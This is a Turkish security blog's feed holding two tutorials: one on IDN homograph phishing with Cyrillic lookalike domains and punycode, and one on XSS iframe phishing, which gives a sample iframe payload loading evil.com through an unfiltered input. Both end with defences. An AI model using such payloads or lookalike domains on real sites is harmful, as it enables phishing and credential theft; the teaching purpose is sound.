phishing arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Sat, 22 Jun 2019 21:48:33 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png phishing arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | IDN Homograph Attack https://canyoupwn.me/tr-idn-homograph-attack/ https://canyoupwn.me/tr-idn-homograph-attack/#comments Tue, 18 Apr 2017 19:16:51 +0000 https://canyoupwn.me/?p=6930 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Yukarıdaki ekran görüntülerine baktığınızda resmi ve güvenli bir site olduğunu düşünüyorsanız yanılıyorsunuz. Chrome tarayıcının şu anki sürümünü (57.0.2987) ya da Firefox’un şu anki sürümünü (52.0.2) kullanıyorsanız siteleri daha yakından incelemek için bağlantılara tıklayın http://www.apple.com https://www.epic.com Şimdi de orjinal siteleri ziyaret edelim https://www.apple.com http://www.epic.com Internet Explorer ya da Safari tarayıcılarını kullanıyorsanız durumun farkına varmış olmanız gerek. […]

TR | IDN Homograph Attack Gökay Atar

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Yukarıdaki ekran görüntülerine baktığınızda resmi ve güvenli bir site olduğunu düşünüyorsanız yanılıyorsunuz. Chrome tarayıcının şu anki sürümünü (57.0.2987) ya da Firefox’un şu anki sürümünü (52.0.2) kullanıyorsanız siteleri daha yakından incelemek için bağlantılara tıklayın http://www.apple.com https://www.epic.com

Şimdi de orjinal siteleri ziyaret edelim https://www.apple.com http://www.epic.com Internet Explorer ya da Safari tarayıcılarını kullanıyorsanız durumun farkına varmış olmanız gerek.

Size sanki bankanızdan gelmiş gibi bir mail atılmış olsun ve bağlantıya tıkladığınızda bankanın gerçek sitesinde dolaştığınızı sanarken aslında banka sitesini klonlayan saldrıgan arkaplanda bilgilerinizi çalıyor olabilir. Peki yukardaki örneklerde orjinal siteyle sahte arasında ki fark ne? Alan adları aynı görünmesine rağmen nasıl farklı sitelere ulaştık?

Şimdi http://www.apple.com ssl sertifikasına bakalım.

İlk başta Firefox alan adını normalmiş gibi gösterirken sertifikayı görüntülediğimizde www.xn--80ak6aa92e.com adresini görüyoruz. Bu arada büyük bir uyarı yapalım  ssl sertifikası olan her  site güvenlirdir diye algı var var fakat bu tamamen yanlıştır.

Eskiden sadece kısıtlı karakterlerde alan adı kaydı yapabiliyorduk. İçinde ingilizce karakterler  a-z, A-Z, 0-9 ve ‘-” dışında alan adlarını kayıt etmemiz izin verilmiyordu. Bu kural kendi dilimizde alan adı almamızı engelliyordu. Farklı dillerdeki karakterleri de kayıt edebilmemiz için internationalized domain name (IDN) standardı oluşturuldu. Türkçe ya da diğer dillerdeki özel karakterleri içeren alan adları kayıt edebilmemize olanak sağlandı.

IDN standartları, var olan alan adı sistemini yeniden tasarlamaktan ziyade var olanı genişletmeye yönelik oluşturuldu. Bu yüzden unicode’u ASCII şekilde ifade edebilmek için punycode oluşturuldu. Böylece çince ya da türkçe gibi dillerdeki karakterleri punycode ile ascii karakterlere çevirebiliyoruz.

Örneğin özgürmüyüyüz.com alan adını almak istediğimizde zgrmyyz-80a0dcbb.com punycode olarak çevirlir ve ASCII uyumluluğunu belirtmek için başına “xn--” ön eki eklenir. Kısaca özgürmüyüyüz.com karşımıza xn--zgrmyyz-80a0dcbb.com olarak çıkar.

Japonca 天照  (katakana: amaterasu) kelimesini örnek alalım. 天照.com alan adını almak istediğimde ASCII uyumlu xn--rss077c.com’a çevrilir punycode sayesinde de her iki şekilde siteye erişebiliriz.

Punycode’u öğrendiğimzie göre apple’a geri dönelim. apple.com hali hazırda ASCII uyumlu iken sahte sitemiz xn--80ak6aa92e.com  olarak gözüktü çünkü “a” karakteri kiril alfabesine göre kayıt edilmiş.

https://unicode-table.com/en/#control-character  adresinden 0061. karakter latin alfabesinde ki “a” iken 0430.karakterin kiril alfabesinde ki “а” olduğunu görebilrisiniz.

Firefox ve chrome bir sonraki güncellemelerinde siteleri adres satırında unicode yerine punycode olarak gösterecek böylece bu tarz aldatmaların farkına varabileceksiniz.

Firefoxta güncellemeyi beklemeden tarayıcının gelişmiş ayarlarından punycode görüntülenemsini sağlayabilirsiniz. Bunun için adres satırına about:config  yazıp,  network.IDN_show_punycode  saıtınındaki false değerini true olarak güncelleyebilirsiniz.

TR | IDN Homograph Attack Gökay Atar

]]>
https://canyoupwn.me/tr-idn-homograph-attack/feed/ 3
TR | XSS ile Iframe Phishing https://canyoupwn.me/tr-xss-ile-iframe-phishing/ https://canyoupwn.me/tr-xss-ile-iframe-phishing/#respond Wed, 15 Jun 2016 07:31:17 +0000 https://canyoupwn.me/?p=2752 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Cross-Site Scripting atakları (XSS, bazen CSS olarak da kısaltılır) zararlı scriptleri web uygulamasında çalıştırmaya olanak sağlayan bir injection çeşitidir. Bu zararlı script, cookielere, session ID’lere, web uygulamasının ulaşabildiği tüm hassas içeriğe ulaşabilir ve çalabilir. XSS saldırıları bir “javascript” ya da bir iframe yerleştirilerek oluşturulabilir. Iframe (Inline Frames), bir web sitesinde bir html dökumanınn içerisine gömülü […]

TR | XSS ile Iframe Phishing CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Cross-Site Scripting atakları (XSS, bazen CSS olarak da kısaltılır) zararlı scriptleri web uygulamasında çalıştırmaya olanak sağlayan bir injection çeşitidir. Bu zararlı script, cookielere, session ID’lere, web uygulamasının ulaşabildiği tüm hassas içeriğe ulaşabilir ve çalabilir. XSS saldırıları bir “javascript” ya da bir iframe yerleştirilerek oluşturulabilir. Iframe (Inline Frames), bir web sitesinde bir html dökumanınn içerisine gömülü olarak bulunan başka bir html dokümanıdır. Kendi Document Object Model (DOM)’ine sahip olduğu için gömülü olduğu html içeriğinden bağımsız olarak configure edilebilir.

 

iframeörnek

 

Iframe aynı zamanda, mevcut web sayfasının içine başka bir web sayfası gömmek için kullanılan bir html tagidir. Sayfada bir pencere oluşturur ve diğer web sayfasını bu frame’in içine yükler. Saldırgan iframe’leri bir şekilde farkedilmez yaparak, örneğin iframe borderlarını kaldırarak, kullanıcıyı zararlı sayfaya yönlendirir. abc.com bir websayfası ve evil.com da bir iframe olsun. Kullanıcı abc.com’a giriş yaptığında evil.com içeriği gözükecektir. Örneğin dopcik.com sitesinde basit bir input ve buton olsun. Buton herhangi bir kontrolden geçirilmeden ekrana inputtaki yazıyı bassın. Saldırgan bu input alanına aşağıdaki gibi bir iframe kodu girerek kendi sitesinin içeriğini ekleyebilir.

<iframe height="768px" width="1368px" src="http://www.evil.com"></iframe>

 

xssiframe1

Yukarıdaki gibi inputu girdiğimizde site içeriği aşağıdaki gibi dopcik.com sitesinin önünde gözükür.

 

xssiframe2

 

Xss ile Iframe Phishing saldırılarında URL aynı kaldığı için saldırı çoğu zaman fark edilmez. XSS Iframe phishing ile saldırganın hayal gücüne bağlı olarak kişisel ya da banka şifreleri gibi özel bilgiler ele geçirilebilir ve kritik verilere erişim hakkı kazanılabilir. Hatta sitenin içindeki reklamlar değiştirilerek doğrudan bir kazanç bile elde edilebilir. Bir başka örnek ise, kullanıcı doğrulaması gerektiren ya da kullanıcıdan hassas bir bilgiyi input olarak alan bir websitesinin kopyasını almak ve iframe saldırısı gerçekleştirmektir. Böylece kullanıcı original sitede işlem yaptığını düşünürken bilgileri saldırganın eline geçmiş olur. Bu site kullanıcı tarafından güvenilen bir site ise muhtemelen tüm kişisel bilgilerini verecektir.

 

xssiframe3

 

Saldırılardan korunmak için alınan girdilerin kontrol edilip istenmeyen karakterlerin filtrelenmesi gerekmektedir.

TR | XSS ile Iframe Phishing CanYouPwnMe

]]>
https://canyoupwn.me/tr-xss-ile-iframe-phishing/feed/ 0